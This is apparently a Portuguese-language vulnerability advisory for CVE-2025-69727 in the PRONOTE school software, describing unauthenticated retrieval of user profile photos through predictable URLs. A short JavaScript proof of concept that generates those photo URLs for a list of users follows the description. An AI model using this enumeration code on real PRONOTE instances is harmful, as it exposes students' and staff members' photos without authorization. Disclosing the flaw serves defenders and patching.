
CVE-2025-69727
PRONOTE - 202X.X.X < 2025.2.8
Existe uma vulnerabilidade de Controle de Acesso Incorreto no INDEX-EDUCATION PRONOTE anterior à versão 2025.2.8. Os componentes afetados (composeUrlImgPhotoIndividu) permitem a construção de URLs diretas para imagens de perfil de usuários com base apenas em identificadores previsíveis, como IDs e nomes de usuários. Devido à falta de verificações de autorização e ausência de limitação de taxa ao gerar ou acessar essas URLs, um agente não autenticado ou não autorizado pode recuperar fotos de perfil de usuários criando requisições com identificadores adivinhados ou conhecidos.
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});